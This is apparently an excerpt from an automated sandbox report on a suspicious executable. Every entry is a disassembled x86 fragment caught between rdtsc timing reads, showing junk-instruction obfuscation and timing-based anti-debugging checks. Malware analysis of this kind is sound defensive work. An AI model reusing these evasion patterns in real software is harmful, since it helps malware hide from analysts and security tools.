            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C57CE4 second address: C57D84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 add ebx, 11EE3895h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F82E8EDE518h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f push ebx 0x00000030 add dword ptr [ebp+122D221Bh], edi 0x00000036 pop ebx 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007F82E8EDE518h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 00000015h 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 mov eax, dword ptr [ebp+122D04DDh] 0x0000005e mov dword ptr [ebp+122D369Ah], ecx 0x00000064 push FFFFFFFFh 0x00000066 mov ebx, ecx 0x00000068 jmp 00007F82E8EDE525h 0x0000006d nop 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F82E8EDE527h 0x00000075 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C57D84 second address: C57D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F82E84F6186h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C57D8E second address: C57D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5ECD9 second address: C5ECEB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F82E84F6186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F82E84F6186h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C668E8 second address: C66905 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE529h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C66905 second address: C6690E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6690E second address: C66948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F82E8EDE516h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F82E8EDE529h 0x00000011 popad 0x00000012 pop esi 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F82E8EDE516h 0x0000001c jmp 00007F82E8EDE51Ah 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C662EE second address: C66337 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F82E84F618Eh 0x00000008 je 00007F82E84F6197h 0x0000000e jmp 00007F82E84F6191h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F82E84F6192h 0x0000001c jnl 00007F82E84F618Ch 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C66478 second address: C6649C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F82E8EDE527h 0x0000000c ja 00007F82E8EDE516h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B90C second address: C6B926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E84F6196h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BBE5 second address: C6BC08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F82E8EDE528h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BC08 second address: C6BC0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BC0D second address: A9B942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F82E8EDE522h 0x00000012 pop eax 0x00000013 stc 0x00000014 push dword ptr [ebp+122D06C5h] 0x0000001a jmp 00007F82E8EDE524h 0x0000001f call dword ptr [ebp+122D2026h] 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D1FBFh], esi 0x0000002c xor eax, eax 0x0000002e jg 00007F82E8EDE51Ch 0x00000034 or dword ptr [ebp+122D1FBFh], edx 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e mov dword ptr [ebp+122D1FBFh], esi 0x00000044 jo 00007F82E8EDE51Ch 0x0000004a add dword ptr [ebp+122D19B4h], edi 0x00000050 mov dword ptr [ebp+122D2985h], eax 0x00000056 xor dword ptr [ebp+122D201Dh], eax 0x0000005c mov esi, 0000003Ch 0x00000061 add dword ptr [ebp+122D23B6h], ecx 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b mov dword ptr [ebp+122D1853h], edx 0x00000071 lodsw 0x00000073 mov dword ptr [ebp+122D35B2h], edx 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d jns 00007F82E8EDE522h 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 mov dword ptr [ebp+122D201Dh], ecx 0x0000008d nop 0x0000008e jo 00007F82E8EDE522h 0x00000094 jnc 00007F82E8EDE51Ch 0x0000009a push eax 0x0000009b push eax 0x0000009c push edx 0x0000009d jl 00007F82E8EDE518h 0x000000a3 push ecx 0x000000a4 pop ecx 0x000000a5 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70923 second address: C7092C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70BF9 second address: C70BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70BFF second address: C70C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7125E second address: C7126A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ebx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7126A second address: C71270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C71270 second address: C7128A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F82E8EDE522h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7128A second address: C7129E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 ja 00007F82E84F6186h 0x0000000b pop eax 0x0000000c jo 00007F82E84F618Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74705 second address: C7470F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7A0CE second address: C7A0D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7A0D6 second address: C7A0DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02C3A second address: C02C91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F6198h 0x00000007 pushad 0x00000008 jng 00007F82E84F6186h 0x0000000e jmp 00007F82E84F6196h 0x00000013 jg 00007F82E84F6186h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pushad 0x0000001f jmp 00007F82E84F618Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02C91 second address: C02C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79269 second address: C792A3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F82E84F6192h 0x00000008 jmp 00007F82E84F6191h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F82E84F6191h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79418 second address: C7943A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F82E8EDE525h 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F82E8EDE516h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7943A second address: C7943E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C798D7 second address: C798E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E8EDE51Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C798E8 second address: C798EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C798EE second address: C798FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F82E8EDE516h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F063 second address: C7F0A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F82E84F6186h 0x0000000c jmp 00007F82E84F6196h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F82E84F6197h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F0A2 second address: C7F0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4A9C3 second address: C4A9C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4AAD0 second address: A9B942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F82E8EDE51Eh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 call 00007F82E8EDE51Bh 0x00000018 jbe 00007F82E8EDE52Ch 0x0000001e jmp 00007F82E8EDE526h 0x00000023 pop ecx 0x00000024 push dword ptr [ebp+122D06C5h] 0x0000002a call dword ptr [ebp+122D2026h] 0x00000030 pushad 0x00000031 mov dword ptr [ebp+122D1FBFh], esi 0x00000037 xor eax, eax 0x00000039 jg 00007F82E8EDE51Ch 0x0000003f or dword ptr [ebp+122D1FBFh], edx 0x00000045 mov edx, dword ptr [esp+28h] 0x00000049 mov dword ptr [ebp+122D1FBFh], esi 0x0000004f jo 00007F82E8EDE51Ch 0x00000055 add dword ptr [ebp+122D19B4h], edi 0x0000005b mov dword ptr [ebp+122D2985h], eax 0x00000061 xor dword ptr [ebp+122D201Dh], eax 0x00000067 mov esi, 0000003Ch 0x0000006c add dword ptr [ebp+122D23B6h], ecx 0x00000072 add esi, dword ptr [esp+24h] 0x00000076 mov dword ptr [ebp+122D1853h], edx 0x0000007c lodsw 0x0000007e mov dword ptr [ebp+122D35B2h], edx 0x00000084 add eax, dword ptr [esp+24h] 0x00000088 jns 00007F82E8EDE522h 0x0000008e mov ebx, dword ptr [esp+24h] 0x00000092 mov dword ptr [ebp+122D201Dh], ecx 0x00000098 nop 0x00000099 jo 00007F82E8EDE522h 0x0000009f jnc 00007F82E8EDE51Ch 0x000000a5 push eax 0x000000a6 push eax 0x000000a7 push edx 0x000000a8 jl 00007F82E8EDE518h 0x000000ae push ecx 0x000000af pop ecx 0x000000b0 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4AB9A second address: C4ABA4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F82E84F618Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4ACA9 second address: C4ACDE instructions: 0x00000000 rdtsc 0x00000002 je 00007F82E8EDE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F82E8EDE518h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], esi 0x00000016 mov edx, dword ptr [ebp+122D28D1h] 0x0000001c nop 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F82E8EDE525h 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B572 second address: C4B579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B745 second address: C4B749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B749 second address: C4B74E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B74E second address: C4B75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B75E second address: C4B762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B762 second address: C4B7A4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F82E8EDE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F82E8EDE52Dh 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F82E8EDE51Fh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B7A4 second address: C4B7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B7A8 second address: C4B7D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F82E8EDE528h 0x00000016 jmp 00007F82E8EDE522h 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F696 second address: C7F6AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F82E84F6191h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7FB34 second address: C7FB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F82E8EDE516h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7FB45 second address: C7FB65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F82E84F6198h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8303C second address: C8305A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F82E8EDE51Eh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jnl 00007F82E8EDE516h 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007F82E8EDE516h 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8305A second address: C83064 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F82E84F6186h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C877F4 second address: C877F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87C5F second address: C87C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87C63 second address: C87C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87DE6 second address: C87E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F82E84F6192h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87E06 second address: C87E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87E0A second address: C87E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87E10 second address: C87E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87E16 second address: C87E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87E1C second address: C87E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C880EA second address: C88112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F82E84F618Ah 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jmp 00007F82E84F6195h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop eax 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C88112 second address: C88118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C88118 second address: C88132 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F82E84F6186h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F82E84F6192h 0x00000012 jl 00007F82E84F6186h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C88287 second address: C882A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F82E8EDE527h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8B396 second address: C8B3A6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F82E84F6186h 0x00000008 jnc 00007F82E84F6186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8B3A6 second address: C8B3C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE524h 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8B3C1 second address: C8B3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F82E84F618Ah 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8B3D5 second address: C8B3D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8B3D9 second address: C8B3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F82E84F6195h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8B3F7 second address: C8B3FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8B0B5 second address: C8B0BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8DD1B second address: C8DD33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F82E8EDE51Dh 0x00000009 je 00007F82E8EDE516h 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8DD33 second address: C8DD45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F618Dh 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8DEB3 second address: C8DECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007F82E8EDE51Ch 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E1AA second address: C8E1AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E1AE second address: C8E1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C941AA second address: C941B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F82E84F6186h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C941B4 second address: C941BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B20D second address: C4B217 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F82E84F618Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B217 second address: C4B2A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F82E8EDE526h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F82E8EDE518h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 sub dword ptr [ebp+1246AFD8h], ecx 0x0000002d mov ebx, dword ptr [ebp+124821DCh] 0x00000033 stc 0x00000034 add eax, ebx 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F82E8EDE518h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 00000017h 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 jmp 00007F82E8EDE51Ah 0x00000055 nop 0x00000056 jmp 00007F82E8EDE51Bh 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B2A0 second address: C4B2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C94961 second address: C94967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
